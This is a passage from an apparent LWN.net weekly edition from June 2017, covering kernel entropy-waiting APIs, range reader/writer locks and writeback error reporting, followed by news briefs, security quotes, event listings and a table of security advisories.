The final step is to get the low-level filesystem code to use the new reporting mechanism when something goes wrong. Rather than convert all filesystems at once, Layton chose to add a new filesystem-type flag (FS_WB_ERRSEQ) that can be set for filesystems that understand the new scheme. Code at the virtual filesystem layer can then react accordingly depending on whether the filesystem has been converted or not. The intent is to remove this flag and the associated mechanism once all in-tree filesystems have made the change.

The ideas behind this patch set were discussed at the 2017 Linux Storage, Filesystem, and Memory-Management Summit in March; the patches themselves have been through five public revisions since then. There is a reasonable chance that they are approaching a sort of final state where they can be considered for merging in an upcoming development cycle. The result will not be perfect writeback error reporting, but it should be significantly better than what the kernel offers now.

Comments (39 posted)

Waiting for entropy

By Jonathan Corbet
June 6, 2017
Many bytes have been expended over the years discussing the virtues of the kernel's random number generation subsystem. One of the biggest recurring concerns has to do with systems that are unable to obtain sufficient entropy during the boot process to meet early demands for random data. The latest discussion on this topic got off to a bit of a rough start, but it may lead to an incremental improvement in this area.

Jason Donenfeld started the thread with a complaint that /dev/urandom will, when read from user space, return data even if the kernel's internal entropy pool has not yet been properly seeded. In such a case, it is theoretically possible for an attacker to predict the not-so-random data that will be returned. He asserted that /dev/urandom should simply block until the entropy pool is ready, and dismissed the reasoning behind the current behavior: "Yes, yes, you have arguments for why you're keeping this pathological, but you're still wrong, and this api is still a bug."

Bug or not, as Ted Ts'o pointed out, making /dev/urandom block causes distributions like Ubuntu and OpenWrt to fail to boot. That sort of behavioral change is typically called a "regression", and regressions of this sort are not normally allowed. So /dev/urandom will retain its current behavior. But that isn't the point Donenfeld was really trying to address anyway. The real issue, as it turns out, has to do with getting random data from within the kernel instead of from user space. That can be done with a call to:

    void get_random_bytes(void *buf, int nbytes);

This function will place nbytes of random data into the buffer pointed to by buf; it will do so regardless of whether the entropy pool is fully initialized. So, once again, it is possible to get data that is not truly random. Since this function is called from inside the kernel, those calls can happen early in the boot process, so the chance of encountering an insufficiently random entropy pool is relatively high.

This problem is not unknown to the kernel development community, of course. In 2015, Stephan Mueller proposed the addition of a version of get_random_bytes() that would block until the entropy pool is ready, should that be necessary. That idea ran into trouble, though, when Herbert Xu pointed out that it could lead to deadlocks — just the sort of random event that tends not to be of interest. So, instead, a callback interface was created. Kernel code that wants to ensure that it gets good random data starts by creating a callback function and placing a pointer to that function in a random_ready_callback structure:

    struct random_ready_callback {
	struct list_head list;
	void (*func)(struct random_ready_callback *rdy);
	struct module *owner;
    };

That structure is then passed to add_random_ready_callback():

    int add_random_ready_callback(struct random_ready_callback *rdy);

When the random-number subsystem is ready, the given callback function will be called. By adding some more structure (most likely using a completion), the calling code can create something that looks like a synchronous function to get random data.

As Donenfeld pointed out, this interface is a little bit on the cumbersome side, which may have something to do with the fact that it has exactly one call site in the kernel. He suggested that it might make sense to add a synchronous interface that could be used in at least some situations; that would make it possible to fix some places in the kernel that are at risk of using nonrandom data. Ts'o agreed that this approach might make sense:

Or maybe we can then help figure out what percentage of the callsites can be fixed with a synchronous interface, and fix some number of them just to demonstrate that the synchronous interface does work well.

The end result was a patch series from Donenfeld adding a new function:

    int wait_for_random_bytes(bool is_interruptable, unsigned long timeout);

As its name might suggest, wait_for_random_bytes() will wait until random data is available. If is_interruptable is set, the function will return early (with an error code) should the calling process receive a signal. The timeout parameter can be used to put an upper bound on how long the call will wait. This functionality turned out to be a bit more than was needed, though; in particular, Ts'o expressed skepticism about the timeout idea, asking: "If you are using get_random_bytes() for security reasons, does the security reason go away after 15 seconds?" The third version of the patch set removed all of the arguments to wait_for_random_bytes(), making all waits interruptible with no timeout.

The patch series then adds a set of convenience functions to combine waiting and actually getting the random data, including:

    static inline int get_random_bytes_wait(void *buf, int nbytes);

Most of the comments on the patch set at this point are about relatively minor issues. So chances are that some version of this patch set will find its way into the kernel eventually, with the result, hopefully, that there will be a reduced chance of kernel code using insufficiently random data. But there is one other aspect of this situation that seems entirely deterministic: the arguments about the quality of the kernel's random-number subsystem are far from finished. That is, after all, the fundamental problem with random numbers: it is difficult to be sure that they are truly random.

Comments (39 posted)

Range reader/writer locks for the kernel

By Jonathan Corbet
June 5, 2017
The kernel uses a variety of lock types internally, but they all share one feature in common: they are a simple either/or proposition. When a lock is obtained for a resource, the entire resource is locked, even if exclusive access is only needed to a part of that resource. Many resources managed by the kernel are complex entities for which it may make sense to only lock a smaller part; files (consisting of a range of bytes) or a process's address space are examples of this type of resource. For years, kernel developers have talked about adding "range locks" — locks that would only apply to a portion of a given resource — as a way of increasing concurrency. Work has progressed in that area, and range locks may soon be added to the kernel's locking toolkit.

Jan Kara posted a range-locking mechanism in 2013, but that work stalled and never made it into the mainline. More recently, Davidlohr Bueso has picked up that work and extended it. The result is a new form of reader/writer lock — a lock, in other words, that distinguishes between read-only and write access to a resource. Reader/writer locks can increase concurrency in settings where the protected resource is normally accessed by readers, since all readers can run simultaneously. Whenever a writer comes along, though, it must have exclusive access to the resource. Balancing access between readers and writers can be a tricky business where the wrong decisions can lead to starvation, unfairness, or poor concurrency.

Since range locks only cover part of a resource, there can be many of them covering separate parts of the resource as a whole. The data structure that describes all of the known range locks, including those that are waiting for the needed range to become available, for a given resource is a "range lock tree", represented by struct range_lock_tree. This "tree" is the lock that protects the resource as a whole; it will typically be located in or near the relevant data structure where one would otherwise find a simpler lock. Thus, a range-locking implementation will tend to start with something like:

    #include <linux/range_lock.h>

    DEFINE_RANGE_LOCK_TREE(my_tree);

Given the range_lock_tree structure to protect the resource, a thread needing access to a portion of that resource will need to acquire a lock on the range of interest. A lock on a specific range (whether granted or not) is represented by struct range_lock. It is possible to declare and initialize a range lock statically with either of:

    DEFINE_RANGE_LOCK(my_lock, start, end);
    DEFINE_RANGE_LOCK_FULL(name);

The second variant above will describe a lock on the entire range. It is also possible to initialize a range_lock structure at run time with either of:

    void range_lock_init(struct range_lock *lock, unsigned long start,
    			 unsigned long end);
    void range_lock_init_full(struct range_lock *lock);

Actually acquiring a range lock requires calling one of a large set of primitives. In the simplest case, a call to range_read_lock() will acquire a read lock on the indicated range, blocking if necessary to wait for the range to become available:

    void range_read_lock(struct range_lock_tree *tree, struct range_lock *lock);

The lock for the entire resource is provided as tree, while lock describes the region that is to be locked. Like most sleeping lock primitives, range_read_lock() will go into a non-interruptible sleep if it must wait. That behavior can be changed by calling one of the other locking functions:

    int range_read_lock_interruptible(struct range_lock_tree *tree,
				      struct range_lock *lock);
    int range_read_lock_killable(struct range_lock_tree *tree, struct range_lock *lock);
    int range_read_trylock(struct range_lock_tree *tree, struct range_lock *lock);

In any case, a read lock that has been granted must eventually be released with:

    void range_read_unlock(struct range_lock_tree *tree, struct range_lock *lock);

If, instead, the range must be written to, a write lock should be obtained with one of:

    void range_write_lock(struct range_lock_tree *tree, struct range_lock *lock);
    int range_write_lock_interruptible(struct range_lock_tree *tree,
				       struct range_lock *lock);
    int range_write_lock_killable(struct range_lock_tree *tree, struct range_lock *lock);
    int range_write_trylock(struct range_lock_tree *tree, struct range_lock *lock);

A call to range_write_unlock() will release a write lock. It is also possible to turn a write lock into a read lock with:

    void range_downgrade_write(struct range_lock_tree *tree, struct range_lock *lock);

The implementation does not give any particular priority to either readers or writers. If a writer is waiting for a given range, a reader that arrives later requesting an intersecting range will wait behind the writer, even if other readers are active in that range at the time. The result is, possibly, less concurrency than might otherwise be possible, but this approach also ensures that writers will not be starved for access.

This patch set has been through a few revisions and does not seem to be generating much more in the way of comments, so it might be about ready to go. The first user is the Lustre filesystem, which is already using a variant of Kara's range-lock implementation internally to control access to ranges of files. But there is a potentially more interesting user waiting in the wings: using range locks as a replacement for mmap_sem.

The reader/writer semaphore known as mmap_sem is one of the most intractable contention points in the memory-management subsystem. It protects a process's memory map, including, to an extent, the page tables. Many performance-sensitive operations, such as handling page faults, must acquire mmap_sem with the result that, on many workloads, contention for mmap_sem is a significant performance bottleneck. Protecting a process's virtual address space would appear to be a good application for a range lock. Most of the time, a change to the address space does not affect the entire space; it is, instead, focused on a particular set of addresses. Using range locks would allow more operations on a given address space to proceed concurrently, reducing contention and improving performance.

The patch set (posted by Laurent Dufour) does not yet achieve that goal; instead, the entire range is locked every time. Thus, with these patches, a range lock replaces mmap_sem without really changing how things work. Restricting the change in this way allows the developers to be sure that the switch to a range lock has not introduced any bugs of its own. Once confidence in that change exists, developers will be able to start reducing the ranges to what is actually needed.

These changes will need to be made with care, especially since what is being protected by mmap_sem is not always clear. But, given enough development cycles, the mmap_sem bottleneck should slowly dissolve away, leaving us with a faster, more concurrent memory-management subsystem. Some improvements are worth waiting for.

Comments (10 posted)

Page editor: Jake Edge

Brief items

Security

Security quotes of the week

In fact nobody really cared about pollution until a river actually lit on fire. There are still some who don't, even after a river lit on fire.

I think there are many of us in security who keep waiting for demand to appear for more security. We keep watching and waiting, any day now everyone will see why this matters! It's not going to happen though. We do need security more and more each day. The way everything is heading, things aren't looking great. I'd like to think we won't have to wait for the security equivalent of a river catching on fire, but I'm pretty sure that's what it will take.

Josh Bressers

Up till now, we've known how to make two kinds of fairly secure system. There's the software in your phone or laptop which is complex and exposed to online attack, so has to be patched regularly as vulnerabilities are discovered. It's typically abandoned after a few years as patching too many versions of software costs too much. The other kind is the software in safety-critical machinery which has tended to be stable, simple and thoroughly tested, and not exposed to the big bad Internet. As these two worlds collide, there will be some rather large waves.

Regulators who only thought in terms of safety will have to start thinking of security too. Safety engineers will have to learn adversarial thinking. Security engineers will have to think much more about ease of safe use. Educators will have to start teaching these subjects together. (I just expanded my introductory course on software engineering into one on software and security engineering.) And the policy debate will change too; people might vote for the FBI to have a golden master key to unlock your iPhone and read your private messages, but they might be less likely to vote them a master key to take over your car or your pacemaker.

Ross Anderson

People inside the NSA are quick to discount these studies, saying that the data don't reflect their reality. They claim that there are entire classes of vulnerabilities the NSA uses that are not known in the research world, making rediscovery less likely. This may be true, but the evidence we have from the Shadow Brokers is that the vulnerabilities that the NSA keeps secret aren't consistently different from those that researchers discover. And given the alarming ease with which both the NSA and CIA are having their attack tools stolen, rediscovery isn't limited to independent security research.

Bruce Schneier

Comments (none posted)

Kernel development

Kernel release status

The current development kernel is 4.12-rc4, which was released on June 4. Linus Torvalds is generally happy with where things are: "Things remain fairly calm for 4.12, although not quite as calm as it appeared earlier in the week. I think two thirds of the commits came in on Friday or the weekend. But timing aside, it all looks fairly normal."

Stable kernels: 4.11.4, 4.9.31, 4.4.71, and 3.18.56 were released on June 7.

Comments (none posted)

Linux 4.1.40 is vulnerable to CVE-2017-6074

Mark H. Weaver has sent us an alert that the 4.1.40 long-term stable kernel is still susceptible to CVE-2017-6074, a local privilege-escalation vulnerability in the kernel's DCCP implementation that was reported back in February and has been present in Linux for more than ten years. An updated version of the kernel from maintainer Sasha Levin is expected soon.

Full Story (comments: none)

Distributions

Gentoo dropping support of SPARC

The Gentoo security team has announced that the SPARC architecture will no longer be supported by the security team. "This decision follows the council decision on 2016-12-11, 'The council defers to the security team, but is supportive of dropping security support for sparc if it is unable to generally meet the security team timelines.'"

Full Story (comments: 12)

Distribution quote of the week

So I suggest to introduce a new bug report severity "annoying" which is placed somewhere around "normal", but is one of the "release-critical" severities.

Any bug with that severity and at least three "me too" or "+1" postings is allowed to be fixed with a zero-day NMU.

Additionally I suggest a new tag for bug reports named "popcorn": It's similar to the "security" tag, where all bugs tagged as "security" automatically take the security team into Cc. All bugs tagged with "popcorn" are automatically carbon-copied to the debian-curiosa mailing list.

Axel Beckert

Comments (none posted)

Development

GDB 8.0 released

Version 8.0 of the GDB debugger is out. Changes in this release include Python scripting enhancements, DWARF version 5 support, new targets, and more.

Full Story (comments: none)

GnuPG funding campaign

The GnuPG Project has announced the launch of a funding campaign to further support and improve its mail and data encryption software, GnuPG. "The 6 person development team is currently financed from a successful campaign in early 2015, regular donations from the Linux Foundation, Stripe, Facebook, and a few paid development projects. To ensure long-term stability the new campaign focuses on recurring donations and not one-time donations."

Full Story (comments: 1)

Rivendell v2.16.0

Rivendell 2.16.0 has been released. Rivendell is a radio automation system targeted for use in professional broadcast environments. This version includes audio store hashing, kernel GPIO, Modbus TCP support, and more.

Full Story (comments: none)

Tor Browser 7.0 released

The Tor Browser Team has announced the first stable release in the 7.0 series. "This release brings us up to date with Firefox 52 ESR which contains progress in a number of areas: Most notably we hope having Mozilla's multiprocess mode (e10s) and content sandbox enabled will be one of the major new features in the Tor Browser 7.0 series, both security- and performance-wise. While we are still working on the sandboxing part for Windows (the e10s part is ready), both Linux and macOS have e10s and content sandboxing enabled by default in Tor Browser 7.0. In addition to that, Linux and macOS users have the option to further harden their Tor Browser setup by using only Unix Domain sockets for communication with tor."

Comments (none posted)

Development quotes of the week

Neil did heroic work forcing my crappy software into doing things I never envisioned. Last year he needed a break and asked me to take vmdebootstrap back. I did, and have been hiding from the public eye ever since, since I was so ashamed of the code. (I created a new identity and pretended to be an international assassin and backup specialist, travelling the world forcing people to have at least one tested backup of their system. If you've noticed reports in the press about people reporting near-death experiences while holding a shiny new USB drive, that would've been my fault.)
Lars Wirzenius (Thanks to Paul Wise)

Riddell to be kicked until adding openqa to Neon
Jonathan Riddell (KDE Plasma 5.11 kicks off)

Comments (none posted)

Miscellaneous

FSF: Judge won't dismiss alleged GPL violation: Why this matters

Last month LWN pointed to an article about the Artifex v. Hancom case, in which Hancom used Artifex's Ghostscript in its office product. The Free Software Foundation looks at the case and the recent ruling. "On the latter, the judge found that the business model of Artifex indicated a loss of revenue, but also noted that harm could be found even where money isn't involved. The judge, quoting a prior case, noted that there are 'substantial benefits, including economic benefits, to the creation and distribution of copyrighted works under public licenses that range far beyond traditional license royalties.' While not [dispositive], this last note is particularly interesting for many free software developers, who generally share their work at no cost."

Full Story (comments: none)

Page editor: Jake Edge

Announcements

Newsletters

Distributions and system administration

Development

Meeting minutes

Calls for Presentations

DebConf17 CfP Reminder and Deadline Extension

DebConf will be held August 6-12 in Montreal, Canada. The call for proposals deadline has been extended until June 11.

Full Story (comments: none)

Call for Papers - PGConf.ASIA 2017

PGconf.ASIA will be held December 4-6 in Tokyo, Japan. The submission deadline is July 31.

Full Story (comments: none)

PGConf.EU 2017 Call for Papers and Sponsors

PGConf.EU will be held October 24-27 in Warsaw, Poland. "It will cover topics for PostgreSQL users, developers and contributors, as well as decision and policy makers." The call for proposals closes August 7.

Full Story (comments: none)

CFP Deadlines: June 8, 2017 to August 7, 2017

The following listing of CFP deadlines is taken from the LWN.net CFP Calendar.

Deadline | Event Dates | Event | Location
June 8 | August 25 - August 27 | GNU Hackers' Meeting 2017 | Kassel, Germany
June 11 | August 6 - August 12 | DebConf 2017 | Montreal, Quebec, Canada
June 15 | October 25 - October 27 | KVM Forum 2017 | Prague, Czech Republic
June 15 | August 9 - August 11 | The Perl Conference | Amsterdam, Netherlands
June 16 | October 31 - November 2 | API Strategy & Practice Conference | Portland, OR, USA
June 20 | June 26 - June 28 | 19th German Perl Workshop 2017 in Hamburg | Hamburg, Germany
June 24 | August 28 - September 1 | 10th European Conference on Python in Science | Erlangen, Germany
June 30 | November 21 - November 24 | Open Source Monitoring Conference 2017 | Nürnberg, Germany
June 30 | October 21 | 7th Real-Time Summit | Prague, Czech Republic
June 30 | September 8 - September 10 | GNU Tools Cauldron 2017 | Prague, Czech Republic
July 8 | October 23 - October 25 | Open Source Summit Europe | Prague, Czech Republic
July 8 | October 23 - October 25 | Embedded Linux Conference Europe | Prague, Czech Republic
July 10 | August 26 | FOSSCON | Philadelphia, PA, USA
July 14 | September 29 - September 30 | Ohio LinuxFest | Columbus, OH, USA
July 14 | November 6 - November 8 | OpenStack Summit | Sydney, Australia
July 15 | November 4 - November 5 | Free Society Conference and Nordic Summit | Oslo, Norway
July 18 | October 6 - October 8 | PyGotham | New York, NY, USA
July 30 | October 25 - October 27 | PyCon DE | Karlsruhe, Germany
July 31 | December 4 - December 6 | PGconf.ASIA 2017 | Tokyo, Japan
July 31 | August 25 - August 26 | Swiss Perl Workshop | Villars-sur-Ollon, Switzerland
August 1 | April 9 - April 12 | ‹Programming› 2018 | Nice, France
August 1 | August 22 - August 29 | Nextcloud Conference | Berlin, Germany
August 1 | September 26 | OpenStack Days UK | London, UK
August 2 | September 20 - September 22 | X.org Developers Conference | Mountain View, CA, USA
August 2 | October 4 - October 5 | Lustre Administrator and Developer Workshop | Paris, France
August 6 | October 6 - October 7 | Seattle GNU/Linux Conference | Seattle, WA, USA
August 6 | January 22 - January 26 | linux.conf.au | Sydney, Australia

If the CFP deadline for your event does not appear here, please tell us about it.

Upcoming Events

Events: June 8, 2017 to August 7, 2017

The following event listing is taken from the LWN.net Calendar.

Date(s) | Event | Location
June 9 | PgDay Argentina 2017 | Santa Fe, Argentina
June 9 - June 10 | Hong Kong Open Source Conference 2017 | Hong Kong, Hong Kong
June 9 - June 11 | SouthEast LinuxFest | Charlotte, NC, USA
June 12 - June 14 | PyCon Israel | Ramat Gan, Israel
June 12 - June 15 | OPNFV Summit | Beijing, China
June 18 - June 23 | The Perl Conference | Washington, DC, USA
June 19 - June 20 | LinuxCon + ContainerCon + CloudOpen China | Beijing, China
June 20 - June 22 | O'Reilly Fluent Conference | San Jose, CA, USA
June 20 - June 22 | O'Reilly Velocity Conference | San Jose, CA, USA
June 20 - June 23 | Open Source Bridge | Portland, OR, USA
June 23 - June 24 | QtDay 2017 | Florence, Italy
June 24 | Tuebix: Linux Conference | Tuebingen, Germany
June 24 - June 25 | Enlightenment Developer Days 2017 | Valletta, Malta
June 26 - June 28 | 19th German Perl Workshop 2017 in Hamburg | Hamburg, Germany
June 26 - June 28 | Deutsche Openstack Tage 2017 | München, Germany
June 26 - June 29 | Postgres Vision | Boston, MA, USA
June 27 - June 29 | O'Reilly Artificial Intelligence Conference | New York, NY, USA
June 30 | Swiss PGDay | Rapperswil, Switzerland
July 3 - July 7 | 13th Netfilter Workshop | Faro, Portugal
July 9 - July 16 | EuroPython 2017 | Rimini, Italy
July 10 - July 16 | SciPy 2017 | Austin, TX, USA
July 16 - July 23 | CoderCruise | New Orleans et al., USA/Caribbean
July 16 - July 21 | IETF 99 | Prague, Czech Republic
July 22 - July 27 | Akademy 2017 | Almería, Spain
July 28 - August 2 | GNOME Users And Developers European Conference 2017 | Manchester, UK
August 3 - August 8 | PyCon Australia 2017 | Melbourne, Australia
August 5 - August 6 | Conference for Open Source Coders, Users and Promoters | Taipei, Taiwan
August 6 - August 12 | DebConf 2017 | Montreal, Quebec, Canada

If your event does not appear here, please tell us about it.

Security updates

Alert summary June 1, 2017 to June 7, 2017

Dist. ID Release Package Date
Arch Linux ASA-201706-8 chromium 2017-06-07
Arch Linux ASA-201706-2 freeradius 2017-06-02
Arch Linux ASA-201706-4 gajim 2017-06-05
Arch Linux ASA-201706-3 libtasn1 2017-06-02
Arch Linux ASA-201706-5 libusbmuxd 2017-06-05
Arch Linux ASA-201706-6 tomcat7 2017-06-06
Arch Linux ASA-201706-7 tomcat8 2017-06-06
Debian DLA-981-1 LTS apng2gif 2017-06-07
Debian DLA-977-1 LTS freeradius 2017-06-05
Debian DLA-980-1 LTS ming 2017-06-06
Debian DSA-3872-1 stable nss 2017-06-01
Debian DLA-972-1 LTS openldap 2017-06-01
Debian DLA-978-1 LTS perl 2017-06-05
Debian DSA-3873-1 stable perl 2017-06-05
Debian DLA-974-1 LTS picocom 2017-06-01
Debian DLA-973-1 LTS strongswan 2017-06-01
Debian DLA-975-1 LTS wordpress 2017-06-02
Debian DLA-976-1 LTS yodl 2017-06-05
Debian DSA-3871-1 stable zookeeper 2017-06-01
Fedora FEDORA-2017-7d698eba8b F24 chromium 2017-06-03
Fedora FEDORA-2017-7d698eba8b F24 chromium-native_client 2017-06-03
Fedora FEDORA-2017-b22de5c767 F24 dropbear 2017-06-04
Fedora FEDORA-2017-8e9bd58cbb F25 dropbear 2017-06-05
Fedora FEDORA-2017-c7c3f7ed26 F25 libtasn1 2017-06-06
Fedora FEDORA-2017-690eedcf41 F25 poppler 2017-06-06
Fedora FEDORA-2017-0b6da97aa5 F24 squirrelmail 2017-06-03
Fedora FEDORA-2017-f85c37ae3d F25 squirrelmail 2017-06-03
Fedora FEDORA-2017-54580efa82 F25 sudo 2017-06-03
Fedora FEDORA-2017-22f1a8404e F25 wget 2017-06-03
Gentoo 201706-05 dbus 2017-06-06
Gentoo 201706-09 filezilla 2017-06-06
Gentoo 201706-14 freetype 2017-06-06
Gentoo 201706-04 git 2017-06-06
Gentoo 201706-06 imageworsener 2017-06-06
Gentoo 201706-11 libpcre 2017-06-06
Gentoo 201706-13 minicom 2017-06-06
Gentoo 201706-01 munge 2017-06-06
Gentoo 201706-08 mupdf 2017-06-06
Gentoo 201706-10 pidgin 2017-06-06
Gentoo 201706-03 qemu 2017-06-06
Gentoo 201706-07 rpcbind 2017-06-06
Gentoo 201706-02 shadow 2017-06-06
Gentoo 201706-15 webkit-gtk 2017-06-07
Gentoo 201706-12 wireshark 2017-06-06
Mageia MGASA-2017-0153 5 git 2017-06-04
Mageia MGASA-2017-0155 5 menu-cache 2017-06-04
Mageia MGASA-2017-0152 5 openvpn 2017-06-01
Mageia MGASA-2017-0154 5 pcmanfm 2017-06-04
openSUSE openSUSE-SU-2017:1497-1 42.2 deluge 2017-06-07
openSUSE openSUSE-SU-2017:1485-1 42.2 libupnp 2017-06-05
openSUSE openSUSE-SU-2017:1475-1 42.2 mariadb 2017-06-02
openSUSE openSUSE-SU-2017:1495-1 42.2 postgresql93 2017-06-07
Oracle ELSA-2017-3579 OL6 kernel 2017-06-01
Oracle ELSA-2017-3580 OL6 kernel 2017-06-01
Oracle ELSA-2017-3579 OL7 kernel 2017-06-01
Oracle ELSA-2017-3580 OL7 kernel 2017-06-01
Oracle ELSA-2017-1381 OL5 sudo 2017-06-02
SUSE SUSE-SU-2017:1471-1 SLE11 strongswan 2017-06-01
Ubuntu USN-3311-1 14.04 16.04 16.10 17.04 libnl3 2017-06-06
Ubuntu USN-3309-1 14.04 16.04 16.10 17.04 libtasn1-6 2017-06-05
Ubuntu USN-3310-1 16.04 16.10 17.04 lintian 2017-06-06
Ubuntu USN-3312-1 16.04 linux, linux-aws, linux-gke, linux-raspi2, linux-snapdragon 2017-06-06
Ubuntu USN-3313-1 16.10 linux, linux-raspi2 2017-06-06
Ubuntu USN-3314-1 17.04 linux, linux-raspi2 2017-06-06
Ubuntu USN-3313-2 16.04 linux-hwe 2017-06-06
Ubuntu USN-3312-2 14.04 linux-lts-xenial 2017-06-06
Ubuntu USN-3308-1 14.04 puppet 2017-06-05
Full Story (comments: none)

Kernel patches of interest

Kernel releases

Linus Torvalds Linux 4.12-rc4 Jun 04
Greg KH Linux 4.11.4 Jun 07
Greg KH Linux 4.9.31 Jun 07
Greg KH Linux 4.4.71 Jun 07
Greg KH Linux 3.18.56 Jun 07
Ben Hutchings Linux 3.16.44 Jun 06
Ben Hutchings Linux 3.2.89 Jun 06

Architecture-specific

Core kernel

Joe Lawrence livepatch: add shadow variable API Jun 01
Sergey Senozhatsky printk: introduce printing kernel threads Jun 02
Goldwyn Rodrigues No wait AIO Jun 05
Nicolas Pitre scheduler tinification Jun 06

Device drivers

Aleksa Sarai tty: add TIOCGPTPEER ioctl Jun 02
Raviteja Garimella Support for USB DRD Phy driver for NS2 Jun 02
sean.wang@mediatek.com Add PMIC support to MediaTek MT7622 SoC Jun 03
Srinath Mannam Broadcom Stingray SATA PHY support Jun 05
thor.thayer@linux.intel.com Add Altera I2C Controller Driver Jun 02
Russell King - ARM Linux Add phylib support for MV88X3310 10G phy Jun 05
Heikki Krogerus New driver for UCSI (USB Type-C) Jun 05
Keiji Hayashibara add UniPhier watchdog support Jun 06
Rajmohan Mani TPS68470 PMIC drivers Jun 06
Christopher Bostic FSI device driver implementation Jun 06

Device-driver infrastructure

Filesystems and block layer

Networking

"Christoph Paasch" (via mptcp-dev Mailing List) <mptcp-dev-1cNGNKGn6cRWdXg3Zgxhqoble9XqW/aP@public.gmane.org> MPTCP Stable Release v0.92 Jun 04

Security-related

Virtualization and containers

Miscellaneous

Karel Zak util-linux v2.30 Jun 02

Page editor: Rebecca Sobol


Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds